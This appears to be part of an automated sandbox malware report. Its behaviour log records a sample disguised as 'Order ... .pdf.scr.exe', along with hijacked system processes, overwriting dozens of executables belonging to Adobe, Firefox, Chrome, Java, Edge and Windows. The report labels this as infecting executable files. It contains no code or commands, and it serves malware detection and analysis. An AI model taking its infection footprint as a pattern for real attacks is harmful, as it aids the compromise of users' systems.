Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
